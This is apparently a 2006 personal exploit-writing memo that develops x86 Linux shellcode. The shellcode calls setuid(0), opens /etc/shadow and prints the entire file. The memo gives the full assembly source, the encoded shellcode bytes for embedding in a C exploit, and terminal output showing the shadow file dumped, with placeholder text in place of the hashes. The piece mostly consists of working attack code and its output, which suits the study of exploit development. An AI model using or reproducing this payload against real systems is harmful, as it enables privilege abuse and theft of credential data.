NENote of Exploiting


2006-11-23 : Print Shadow Payload 2

This is creating payload memo. I created print_shadow payload but that payload is read only 256-bytes from top of /etc/shadow file. So, I refined print_shadow.s payload and created print_shadow_02.s payload. This payload read top of /etc/shadow file to file end.

When the read system call reach end of file, it return 0 as return value. When error happen, it return -1 as return value. Otherwidth, the system call return read character numeric as return value.
So, I use this behavior, after called read system call, I discriminated value of eax register using test instruction. If contents of eax is 0, this job was compleated. Otherwidth, this payload make judgments as the file have more characters, and goes into roop.
In this payload's roop, read one-byte character from file and print out one-byte character to screen until end of file.

[SC] print_shadow_02.s


.globl main

main:
    pushl   %ebp
    movl    %esp,   %ebp

    #setuid
    xorl   %eax,   %eax
    mov    $0x46,  %al
    xorl   %ebx,   %ebx
    xorl   %ecx,   %ecx
    int    $0x80

    jmp ONE

TWO:
    #open
    popl   %ebx
    movb   $0x5,   %al
    movb   %cl,    11(%ebx)
    int    $0x80
    movl   %eax,   %ebx

loop:
    #read
    xorl   %edx,   %edx
    inc    %edx
    movl   %esp,   %ecx
    xorl   %eax,   %eax
    movb   $0x3,   %al
    int    $0x80
    movl   %ebx,   %esi
    test   %eax,   %eax
    jz     done

    #write
    movb   $0x4,   %al
    xorl   %ebx,   %ebx
    movb   $0x1,   %bl
    int    $0x80
    movl   %esi,   %ebx
    jmp    loop

done:
    #close
    movb   $0x6,   %al
    movl   %esi,   %ebx
    int    $0x80

    #exit
    movb   $0x1,   %al
    xorl   %ebx,   %ebx
    int    $0x80

ONE:
    call    TWO
    .string "/etc/shadow"

Exemplification

I comberted this source code to byte-code. And I embedded the payload in C language exploit([SC] exploit.c) as following.


char shellcode[]=
"\x55\x89\xe5\x31\xc0\xb0\x46\x31\xdb\x31"
"\xc9\xcd\x80\xeb\x33\x5b\xb0\x05\x88\x4b"
"\x0b\xcd\x80\x89\xc3\x31\xd2\x42\x89\xe1"
"\x31\xc0\xb0\x03\xcd\x80\x89\xde\x85\xc0"
"\x74\x0c\xb0\x04\x31\xdb\xb3\x01\xcd\x80"
"\x89\xf3\xeb\xe3\xb0\x06\x89\xf3\xcd\x80"
"\xb0\x01\x31\xdb\xcd\x80\xe8\xc8\xff\xff"
"\xff\x2f\x65\x74\x63\x2f\x73\x68\x61\x64"
"\x6f\x77"
;

Next, I compiled and executed this exploit program as following.

defolos@glazheim:~/Desktop$ gcc exploit.c
defolos@glazheim:~/Desktop$ ./a.out
sp = 0xbffff918
ret = 0xbffff918
-------exploit---------------
root:rootのパスワード:13462:0:99999:7:::
daemon:*:13462:0:99999:7:::
bin:*:13462:0:99999:7:::
sys:*:13462:0:99999:7:::
sync:*:13462:0:99999:7:::
games:*:13462:0:99999:7:::
man:*:13462:0:99999:7:::
lp:*:13462:0:99999:7:::
mail:*:13462:0:99999:7:::
news:*:13462:0:99999:7:::
uucp:*:13462:0:99999:7:::
proxy:*:13462:0:99999:7:::
www-data:*:13462:0:99999:7:::
backup:*:13462:0:99999:7:::
list:*:13462:0:99999:7:::
irc:*:13462:0:99999:7:::
gnats:*:13462:0:99999:7:::
nobody:*:13462:0:99999:7:::
Debian-exim:!:13462:0:99999:7:::
defolos:defolosのパスワード:13462:0:99999:7:::
identd:!:13463:0:99999:7:::
sshd:!:13463:0:99999:7:::
canna:!:13463:0:99999:7:::
messagebus:!:13463:0:99999:7:::
hal:!:13463:0:99999:7:::
saned:!:13463:0:99999:7:::
gdm:!:13463:0:99999:7:::
defolos@glazheim:~/Desktop$

I found that this payload print out all contens of /etc/shadow file to screen. Now I acquired method that read end of file and print out to screen.

Issues

Copyleft (C) 2007 Len. All Rights Not Reserved.